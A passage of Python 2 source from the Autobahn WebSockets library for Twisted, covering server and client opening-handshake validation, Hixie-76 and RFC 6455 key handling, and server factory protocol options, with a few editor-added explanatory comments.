if self.debug:
log.msg("connection from %s lost" % self.peerstr)
def parseHixie76Key(self, key):
return int(filter(lambda x: x.isdigit(), key)) / key.count(" ")
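# Worked example (added by the editor for clarity, not in the original source):
# for a hypothetical header value key = "P$7 1A0 0" the digits concatenate to
# 7100 and the key contains 2 spaces, so parseHixie76Key() returns 7100 / 2 == 3550.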
def processHandshake(self):
"""
Process WebSockets opening handshake request from client.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_request_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP request:\n\n%s\n\n" % self.http_request_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_request_data)
## validate WebSocket opening handshake client request
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## HTTP Request line : METHOD, VERSION
##
rl = self.http_status_line.split()
if len(rl) != 3:
return self.failHandshake("Bad HTTP request status line '%s'" % self.http_status_line)
if rl[0].strip() != "GET":
return self.failHandshake("HTTP method '%s' not allowed" % rl[0], HTTP_STATUS_CODE_METHOD_NOT_ALLOWED[0])
vs = rl[2].strip().split("/")
if len(vs) != 2 or vs[0] != "HTTP" or vs[1] not in ["1.1"]:
return self.failHandshake("Unsupported HTTP version '%s'" % rl[2], HTTP_STATUS_CODE_UNSUPPORTED_HTTP_VERSION[0])
## HTTP Request line : REQUEST-URI
##
self.http_request_uri = rl[1].strip()
try:
(scheme, netloc, path, params, query, fragment) = urlparse.urlparse(self.http_request_uri)
## FIXME: check that if absolute resource URI is given,
## the scheme/netloc matches the server
if scheme != "" or netloc != "":
pass
## Fragment identifiers are meaningless in the context of WebSocket
## URIs, and MUST NOT be used on these URIs.
if fragment != "":
return self.failHandshake("HTTP requested resource contains a fragment identifier '%s'" % fragment)
## resource path and query parameters .. this will get forwarded
## to onConnect()
self.http_request_path = path
self.http_request_params = urlparse.parse_qs(query)
except:
return self.failHandshake("Bad HTTP request resource - could not parse '%s'" % rl[1].strip())
## Host
##
if not self.http_headers.has_key("host"):
return self.failHandshake("HTTP Host header missing in opening handshake request")
if http_headers_cnt["host"] > 1:
return self.failHandshake("HTTP Host header appears more than once in opening handshake request")
self.http_request_host = self.http_headers["host"].strip()
if self.http_request_host.find(":") >= 0:
(h, p) = self.http_request_host.split(":")
try:
port = int(str(p.strip()))
except:
return self.failHandshake("invalid port '%s' in HTTP Host header '%s'" % (str(p.strip()), str(self.http_request_host)))
if port != self.factory.port:
return self.failHandshake("port %d in HTTP Host header '%s' does not match server listening port %s" % (port, str(self.http_request_host), self.factory.port))
self.http_request_host = h
else:
if not ((self.factory.isSecure and self.factory.port == 443) or (not self.factory.isSecure and self.factory.port == 80)):
return self.failHandshake("missing port in HTTP Host header '%s' and server runs on non-standard port %d (wss = %s)" % (str(self.http_request_host), self.factory.port, self.factory.isSecure))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
## When no WS upgrade, render HTML server status page
##
if self.webStatus:
self.sendServerStatus()
self.dropConnection(abort = False)
return
else:
return self.failHandshake("HTTP Upgrade header missing", HTTP_STATUS_CODE_UPGRADE_REQUIRED[0])
upgradeWebSocket = False
for u in self.http_headers["upgrade"].split(","):
if u.strip().lower() == "websocket":
upgradeWebSocket = True
break
if not upgradeWebSocket:
return self.failHandshake("HTTP Upgrade headers do not include 'websocket' value (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection headers do not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## Sec-WebSocket-Version PLUS determine mode: Hybi or Hixie
##
if not self.http_headers.has_key("sec-websocket-version"):
if self.debugCodePaths:
log.msg("Hixie76 protocol detected")
if self.allowHixie76:
version = 0
else:
return self.failHandshake("WebSocket connection denied - Hixie76 protocol mode disabled.")
else:
if self.debugCodePaths:
log.msg("Hybi protocol detected")
if http_headers_cnt["sec-websocket-version"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Version header appears more than once in opening handshake request")
try:
version = int(self.http_headers["sec-websocket-version"])
except:
return self.failHandshake("could not parse HTTP Sec-WebSocket-Version header '%s' in opening handshake request" % self.http_headers["sec-websocket-version"])
if version not in self.versions:
## respond with list of supported versions (descending order)
##
sv = sorted(self.versions)
sv.reverse()
svs = ','.join([str(x) for x in sv])
return self.failHandshake("WebSocket version %d not supported (supported versions: %s)" % (version, svs),
HTTP_STATUS_CODE_BAD_REQUEST[0],
[("Sec-WebSocket-Version", svs)])
else:
## store the protocol version we are supposed to talk
self.websocket_version = version
## Sec-WebSocket-Protocol
##
if self.http_headers.has_key("sec-websocket-protocol"):
protocols = [str(x.strip()) for x in self.http_headers["sec-websocket-protocol"].split(",")]
# check for duplicates in protocol header
pp = {}
for p in protocols:
if pp.has_key(p):
return self.failHandshake("duplicate protocol '%s' specified in HTTP Sec-WebSocket-Protocol header" % p)
else:
pp[p] = 1
# ok, no duplicates, save list in order the client sent it
self.websocket_protocols = protocols
else:
self.websocket_protocols = []
## Origin / Sec-WebSocket-Origin
## http://tools.ietf.org/html/draft-ietf-websec-origin-02
##
if self.websocket_version < 13 and self.websocket_version != 0:
# Hybi, but only < Hybi-13
websocket_origin_header_key = 'sec-websocket-origin'
else:
# RFC6455, >= Hybi-13 and Hixie
websocket_origin_header_key = "origin"
self.websocket_origin = None
if self.http_headers.has_key(websocket_origin_header_key):
if http_headers_cnt[websocket_origin_header_key] > 1:
return self.failHandshake("HTTP Origin header appears more than once in opening handshake request")
self.websocket_origin = self.http_headers[websocket_origin_header_key].strip()
else:
# non-browser clients are allowed to omit this header
pass
## Sec-WebSocket-Extensions
##
## extensions requested by client
self.websocket_extensions = []
## extensions selected by server
self.websocket_extensions_in_use = []
if self.http_headers.has_key("sec-websocket-extensions"):
if self.websocket_version == 0:
return self.failHandshake("Sec-WebSocket-Extensions header specified for Hixie-76")
extensions = [x.strip() for x in self.http_headers["sec-websocket-extensions"].split(',')]
if len(extensions) > 0:
self.websocket_extensions = extensions
if self.debug:
log.msg("client requested extensions we don't support (%s)" % str(extensions))
## Sec-WebSocket-Key (Hybi) or Sec-WebSocket-Key1/Sec-WebSocket-Key2 (Hixie-76)
##
if self.websocket_version == 0:
for kk in ['Sec-WebSocket-Key1', 'Sec-WebSocket-Key2']:
k = kk.lower()
if not self.http_headers.has_key(k):
return self.failHandshake("HTTP %s header missing" % kk)
if http_headers_cnt[k] > 1:
return self.failHandshake("HTTP %s header appears more than once in opening handshake request" % kk)
try:
key1 = self.parseHixie76Key(self.http_headers["sec-websocket-key1"].strip())
key2 = self.parseHixie76Key(self.http_headers["sec-websocket-key2"].strip())
except:
return self.failHandshake("could not parse Sec-WebSocket-Key1/2")
else:
if not self.http_headers.has_key("sec-websocket-key"):
return self.failHandshake("HTTP Sec-WebSocket-Key header missing")
if http_headers_cnt["sec-websocket-key"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Key header appears more than once in opening handshake request")
key = self.http_headers["sec-websocket-key"].strip()
if len(key) != 24: # 16 bytes => (ceil(128/24)*24)/6 == 24
return self.failHandshake("bad Sec-WebSocket-Key (length must be 24 ASCII chars) '%s'" % key)
if key[-2:] != "==": # 24 - ceil(128/6) == 2
return self.failHandshake("bad Sec-WebSocket-Key (invalid base64 encoding) '%s'" % key)
for c in key[:-2]:
if c not in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/":
return self.failHandshake("bad character '%s' in Sec-WebSocket-Key (invalid base64 encoding) '%s'" (c, key))
## For Hixie-76, we need 8 octets of HTTP request body to complete HS!
##
if self.websocket_version == 0:
if len(self.data) < end_of_header + 4 + 8:
return
else:
key3 = self.data[end_of_header + 4:end_of_header + 4 + 8]
## Ok, got complete HS input, remember rest (if any)
##
if self.websocket_version == 0:
self.data = self.data[end_of_header + 4 + 8:]
else:
self.data = self.data[end_of_header + 4:]
## WebSocket handshake validated => produce opening handshake response
## Now fire onConnect() on derived class, to give that class a chance to accept or deny
## the connection. onConnect() may throw, in which case the connection is denied, or it
## may return a protocol from the protocols provided by client or None.
##
try:
connectionRequest = ConnectionRequest(self.peer,
self.peerstr,
self.http_headers,
self.http_request_host,
self.http_request_path,
self.http_request_params,
self.websocket_version,
self.websocket_origin,
self.websocket_protocols,
self.websocket_extensions)
## onConnect() will return the selected subprotocol or None
## or raise an HttpException
##
protocol = self.onConnect(connectionRequest)
if protocol is not None and not (protocol in self.websocket_protocols):
raise Exception("protocol accepted must be from the list client sent or None")
self.websocket_protocol_in_use = protocol
except HttpException, e:
return self.failHandshake(e.reason, e.code)
#return self.sendHttpRequestFailure(e.code, e.reason)
except Exception, e:
log.msg("Exception raised in onConnect() - %s" % str(e))
return self.failHandshake("Internal Server Error", HTTP_STATUS_CODE_INTERNAL_SERVER_ERROR[0])
## build response to complete WebSocket handshake
##
response = "HTTP/1.1 %d Switching Protocols\x0d\x0a" % HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Upgrade: WebSocket\x0d\x0a"
response += "Connection: Upgrade\x0d\x0a"
if self.websocket_protocol_in_use is not None:
response += "Sec-WebSocket-Protocol: %s\x0d\x0a" % str(self.websocket_protocol_in_use)
if self.websocket_version == 0:
if self.websocket_origin:
## browser clients provide the header and expect it to be echoed back
response += "Sec-WebSocket-Origin: %s\x0d\x0a" % str(self.websocket_origin)
if self.debugCodePaths:
log.msg('factory isSecure = %s port = %s' % (self.factory.isSecure, self.factory.port))
if (self.factory.isSecure and self.factory.port != 443) or ((not self.factory.isSecure) and self.factory.port != 80):
if self.debugCodePaths:
log.msg('factory running on non-default port')
response_port = ':' + str(self.factory.port)
else:
if self.debugCodePaths:
log.msg('factory running on default port')
response_port = ''
## FIXME: check this! But see below ..
if False:
response_host = str(self.factory.host)
response_path = str(self.factory.path)
else:
response_host = str(self.http_request_host)
response_path = str(self.http_request_uri)
location = "%s://%s%s%s" % ('wss' if self.factory.isSecure else 'ws', response_host, response_port, response_path)
# Safari is very picky about this one
response += "Sec-WebSocket-Location: %s\x0d\x0a" % location
## end of HTTP response headers
response += "\x0d\x0a"
## compute accept body
##
accept_val = struct.pack(">II", key1, key2) + key3
accept = hashlib.md5(accept_val).digest()
response_body = str(accept)
else:
## compute Sec-WebSocket-Accept
##
sha1 = hashlib.sha1()
sha1.update(key + WebSocketProtocol.WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
response += "Sec-WebSocket-Accept: %s\x0d\x0a" % sec_websocket_accept
if len(self.websocket_extensions_in_use) > 0:
response += "Sec-WebSocket-Extensions: %s\x0d\x0a" % ','.join(self.websocket_extensions_in_use)
## end of HTTP response headers
response += "\x0d\x0a"
response_body = ''
if self.debug:
log.msg("sending HTTP response:\n\n%s%s\n\n" % (response, binascii.b2a_hex(response_body)))
## save and send out opening HS data
##
self.http_response_data = response + response_body
self.sendData(self.http_response_data)
## opening handshake completed, move WebSockets connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
self.inside_message = False
if self.websocket_version != 0:
self.current_frame = None
## fire handler on derived class
##
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
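# Worked example (added by the editor for clarity, not in the original source),
# assuming WebSocketProtocol.WS_MAGIC is the RFC 6455 GUID
# "258EAFA5-E914-47DA-95CA-C5AB0DC85B11":
#
#   key = "dGhlIHNhbXBsZSBub25jZQ=="                       # client Sec-WebSocket-Key
#   base64.b64encode(hashlib.sha1(key + WS_MAGIC).digest())
#   # -> "s3pPLMBiTxaQ9kYGzzhZRbK+xOo="                    # echoed in Sec-WebSocket-Accept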
def failHandshake(self, reason, code = HTTP_STATUS_CODE_BAD_REQUEST[0], responseHeaders = []):
"""
During the opening handshake the client request was invalid, so we send an HTTP
error response and then drop the connection.
"""
if self.debug:
log.msg("failing WebSockets opening handshake ('%s')" % reason)
self.sendHttpErrorResponse(code, reason, responseHeaders)
self.dropConnection(abort = False)
def sendHttpErrorResponse(self, code, reason, responseHeaders = []):
"""
Send out HTTP error response.
"""
response = "HTTP/1.1 %d %s\x0d\x0a" % (code, reason.encode("utf-8"))
for h in responseHeaders:
response += "%s: %s\x0d\x0a" % (h[0], h[1].encode("utf-8"))
response += "\x0d\x0a"
self.sendData(response)
def sendHtml(self, html):
raw = html.encode("utf-8")
response = "HTTP/1.1 %d %s\x0d\x0a" % (HTTP_STATUS_CODE_OK[0], HTTP_STATUS_CODE_OK[1])
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Content-Type: text/html; charset=UTF-8\x0d\x0a"
response += "Content-Length: %d\x0d\x0a" % len(raw)
response += "\x0d\x0a"
response += raw
self.sendData(response)
def sendServerStatus(self):
"""
Used to send out server status/version upon receiving an HTTP/GET without
WebSocket upgrade header (and when the option webStatus is True).
"""
html = """
<!DOCTYPE html>
<html>
<body>
<h1>Autobahn WebSockets %s</h1>
<p>
I am not a Web server, but a WebSocket endpoint.
You can talk to me using the WebSocket <a href="http://tools.ietf.org/html/rfc6455">protocol</a>.
</p>
<p>
For more information, please visit <a href="http://autobahn.ws">my homepage</a>.
</p>
</body>
</html>
""" % str(autobahn.version)
self.sendHtml(html)
class WebSocketServerFactory(protocol.ServerFactory, WebSocketFactory):
"""
A Twisted factory for WebSockets server protocols.
"""
protocol = WebSocketServerProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketServerProtocol`.
"""
def __init__(self,
## WebSocket session parameters
url = None,
protocols = [],
server = "AutobahnPython/%s" % autobahn.version,
## debugging
debug = False,
debugCodePaths = False):
"""
Create instance of WebSocket server factory.
Note that you MUST set URL either here or using setSessionParameters() _before_ the factory is started.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake or None (default: "AutobahnWebSockets/x.x.x").
:type server: str
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.isServer = True
## seed RNG which is used for WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, protocols, server)
## default WebSocket protocol options
##
self.resetProtocolOptions()
## number of currently connected clients
##
self.countConnections = 0
def setSessionParameters(self, url = None, protocols = [], server = None):
"""
Set WebSocket session parameters.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake.
:type server: str
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
if path != "/":
raise Exception("path specified for server WebSocket URL")
if len(params) > 0:
raise Exception("query parameters specified for server WebSocket URL")
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.protocols = protocols
self.server = server
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.versions = WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.webStatus = True
self.utf8validateIncoming = True
self.requireMaskedClientFrames = True
self.maskServerFrames = False
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
versions = None,
allowHixie76 = None,
webStatus = None,
utf8validateIncoming = None,
maskServerFrames = None,
requireMaskedClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for new protocol instances.
:param versions: The WebSockets protocol versions accepted by the server (default: WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS).
:type versions: list of ints
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param webStatus: Return server status/version on HTTP/GET without WebSocket upgrade header (default: True).
:type webStatus: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param maskServerFrames: Mask server-to-client frames (default: False).
:type maskServerFrames: bool
:param requireMaskedClientFrames: Require client-to-server frames to be masked (default: True).
:type requireMaskedClientFrames: bool
:param applyMask: Actually apply mask to payload when a mask is present. Applies for outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performing a closing handshake (default: True).
:type failByDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 5).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if versions is not None:
for v in versions:
if v not in WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS:
raise Exception("invalid WebSockets protocol version %s (allowed values: %s)" % (v, str(WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS)))
if v == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if set(versions) != set(self.versions):
self.versions = versions
if webStatus is not None and webStatus != self.webStatus:
self.webStatus = webStatus
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if requireMaskedClientFrames is not None and requireMaskedClientFrames != self.requireMaskedClientFrames:
self.requireMaskedClientFrames = requireMaskedClientFrames
if maskServerFrames is not None and maskServerFrames != self.maskServerFrames:
self.maskServerFrames = maskServerFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def getConnectionCount(self):
"""
Get number of currently connected clients.
:returns: int -- Number of currently connected clients.
"""
return self.countConnections
def startFactory(self):
"""
Called by Twisted before starting to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
def stopFactory(self):
"""
Called by Twisted before stopping to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
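# Illustrative sketch (added by the editor, not in the original source): minimal
# wiring of the server factory with Twisted. It assumes the usual onMessage() /
# sendMessage() callbacks of WebSocketProtocol; URL and port are placeholders.
#
#   class EchoProtocol(WebSocketServerProtocol):
#       def onMessage(self, msg, binary):
#           self.sendMessage(msg, binary)        # echo back verbatim
#
#   factory = WebSocketServerFactory("ws://localhost:9000", debug = False)
#   factory.protocol = EchoProtocol
#   reactor.listenTCP(9000, factory)
#   reactor.run()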
class WebSocketClientProtocol(WebSocketProtocol):
"""
Client protocol for WebSockets.
"""
def onConnect(self, connectionResponse):
"""
Callback fired directly after WebSocket opening handshake when new WebSocket server
connection was established.
:param connectionResponse: WebSocket connection response information.
:type connectionResponse: instance of :class:`autobahn.websocket.ConnectionResponse`
"""
pass
def connectionMade(self):
"""
Called by Twisted when new TCP connection to server was established. Default
implementation will start the initial WebSocket opening handshake.
When overriding in derived class, make sure to call this base class
implementation _before_ your code.
"""
self.isServer = False
WebSocketProtocol.connectionMade(self)
if self.debug:
log.msg("connection to %s established" % self.peerstr)
self.startHandshake()
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection to server was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation _after_ your code.
"""
WebSocketProtocol.connectionLost(self, reason)
if self.debug:
log.msg("connection to %s lost" % self.peerstr)
def createHixieKey(self):
"""
Supposed to implement the crack smoker algorithm below. Well, crack
probably wasn't the stuff they smoked - dog poo?
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76#page-21
Items 16 - 22
"""
spaces1 = random.randint(1, 12)
max1 = int(4294967295L / spaces1)
number1 = random.randint(0, max1)
product1 = number1 * spaces1
key1 = str(product1)
rchars = filter(lambda x: (x >= 0x21 and x <= 0x2f) or (x >= 0x3a and x <= 0x7e), range(0,127))
for i in xrange(random.randint(1, 12)):
p = random.randint(0, len(key1) - 1)
key1 = key1[:p] + chr(random.choice(rchars)) + key1[p:]
for i in xrange(spaces1):
p = random.randint(1, len(key1) - 2)
key1 = key1[:p] + ' ' + key1[p:]
return (key1, number1)
def startHandshake(self):
"""
Start WebSockets opening handshake.
"""
## construct WS opening handshake HTTP header
##
request = "GET %s HTTP/1.1\x0d\x0a" % self.factory.resource.encode("utf-8")
if self.factory.useragent is not None and self.factory.useragent != "":
request += "User-Agent: %s\x0d\x0a" % self.factory.useragent.encode("utf-8")
request += "Host: %s:%d\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "Upgrade: WebSocket\x0d\x0a"
request += "Connection: Upgrade\x0d\x0a"
## handshake random key
##
if self.version == 0:
(self.websocket_key1, number1) = self.createHixieKey()
(self.websocket_key2, number2) = self.createHixieKey()
self.websocket_key3 = os.urandom(8)
accept_val = struct.pack(">II", number1, number2) + self.websocket_key3
self.websocket_expected_challenge_response = hashlib.md5(accept_val).digest()
request += "Sec-WebSocket-Key1: %s\x0d\x0a" % self.websocket_key1
request += "Sec-WebSocket-Key2: %s\x0d\x0a" % self.websocket_key2
else:
self.websocket_key = base64.b64encode(os.urandom(16))
request += "Sec-WebSocket-Key: %s\x0d\x0a" % self.websocket_key
## optional origin announced
##
if self.factory.origin:
if self.version > 10 or self.version == 0:
request += "Origin: %d\x0d\x0a" % self.factory.origin.encode("utf-8")
else:
request += "Sec-WebSocket-Origin: %d\x0d\x0a" % self.factory.origin.encode("utf-8")
## optional list of WS subprotocols announced
##
if len(self.factory.protocols) > 0:
request += "Sec-WebSocket-Protocol: %s\x0d\x0a" % ','.join(self.factory.protocols)
## set WS protocol version depending on WS spec version
##
if self.version != 0:
request += "Sec-WebSocket-Version: %d\x0d\x0a" % WebSocketProtocol.SPEC_TO_PROTOCOL_VERSION[self.version]
request += "\x0d\x0a"
if self.version == 0:
request += self.websocket_key3
self.http_request_data = request
if self.debug:
log.msg(self.http_request_data)
self.sendData(self.http_request_data)
def processHandshake(self):
"""
Process WebSockets opening handshake response from server.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_response_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP response:\n\n%s\n\n" % self.http_response_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_response_data)
## validate WebSocket opening handshake server response
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## Response Line
##
sl = self.http_status_line.split()
if len(sl) < 2:
return self.failHandshake("Bad HTTP response status line '%s'" % self.http_status_line)
## HTTP version
##
http_version = sl[0].strip()
if http_version != "HTTP/1.1":
return self.failHandshake("Unsupported HTTP version ('%s')" % http_version)
## HTTP status code
##
try:
status_code = int(sl[1].strip())
except:
return self.failHandshake("Bad HTTP status code ('%s')" % sl[1].strip())
if status_code != HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]:
## FIXME: handle redirects
## FIXME: handle authentication required
if len(sl) > 2:
reason = " - %s" % sl[2].strip()
else:
reason = ""
return self.failHandshake("WebSockets connection upgrade failed (%d%s)" % (status_code, reason))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
return self.failHandshake("HTTP Upgrade header missing")
if self.http_headers["upgrade"].strip().lower() != "websocket":
return self.failHandshake("HTTP Upgrade header different from 'websocket' (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection header does not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## compute Sec-WebSocket-Accept
##
if self.version != 0:
if not self.http_headers.has_key("sec-websocket-accept"):
return self.failHandshake("HTTP Sec-WebSocket-Accept header missing in opening handshake reply")
else:
if http_headers_cnt["sec-websocket-accept"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Accept header appears more than once in opening handshake reply")
sec_websocket_accept_got = self.http_headers["sec-websocket-accept"].strip()
sha1 = hashlib.sha1()
sha1.update(self.websocket_key + WebSocketProtocol.WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
if sec_websocket_accept_got != sec_websocket_accept:
return self.failHandshake("HTTP Sec-WebSocket-Accept bogus value : expected %s / got %s" % (sec_websocket_accept, sec_websocket_accept_got))
## handle "extensions in use" - if any
##
self.websocket_extensions_in_use = []
if self.version != 0:
if self.http_headers.has_key("sec-websocket-extensions"):
if http_headers_cnt["sec-websocket-extensions"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Extensions header appears more than once in opening handshake reply")
exts = self.http_headers["sec-websocket-extensions"].strip()
##
## we don't support any extensions, but if we did, we would need
## to set self.websocket_extensions_in_use here and not fail the handshake
##
return self.failHandshake("server wants to use extensions (%s), but no extensions implemented" % exts)
## handle "subprotocol in use" - if any
##
self.websocket_protocol_in_use = None
if self.http_headers.has_key("sec-websocket-protocol"):
if http_headers_cnt["sec-websocket-protocol"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Protocol header appears more than once in opening handshake reply")
sp = str(self.http_headers["sec-websocket-protocol"].strip())
if sp != "":
if sp not in self.factory.protocols:
return self.failHandshake("subprotocol selected by server (%s) not in subprotocol list requested by client (%s)" % (sp, str(self.factory.protocols)))
else:
## ok, subprotocol in use
##
self.websocket_protocol_in_use = sp
## For Hixie-76, we need 16 octets of HTTP request body to complete HS!
##
if self.version == 0:
if len(self.data) < end_of_header + 4 + 16:
return
else:
challenge_response = self.data[end_of_header + 4:end_of_header + 4 + 16]
if challenge_response != self.websocket_expected_challenge_response:
return self.failHandshake("invalid challenge response received from server (Hixie-76)")
## Ok, got complete HS input, remember rest (if any)
##
if self.version == 0:
self.data = self.data[end_of_header + 4 + 16:]
else:
self.data = self.data[end_of_header + 4:]
## opening handshake completed, move WebSockets connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
self.inside_message = False
if self.version != 0:
self.current_frame = None
self.websocket_version = self.version
## we handle this symmetrically to the server side .. that is, give the
## client a chance to bail out .. e.g. when no subprotocol was selected
## by the server
try:
connectionResponse = ConnectionResponse(self.peer,
self.peerstr,
self.http_headers,
None, # FIXME
self.websocket_protocol_in_use,
self.websocket_extensions_in_use)
self.onConnect(connectionResponse)
except Exception, e:
## immediately close the WS connection
##
self.failConnection(1000, str(e))
else:
## fire handler on derived class
##
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
def failHandshake(self, reason):
"""
During the opening handshake the server response was invalid, so we drop the
connection.
"""
if self.debug:
log.msg("failing WebSockets opening handshake ('%s')" % reason)
self.dropConnection(abort = True)
class WebSocketClientFactory(protocol.ClientFactory, WebSocketFactory):
"""
A Twisted factory for WebSockets client protocols.
"""
protocol = WebSocketClientProtocol
"""
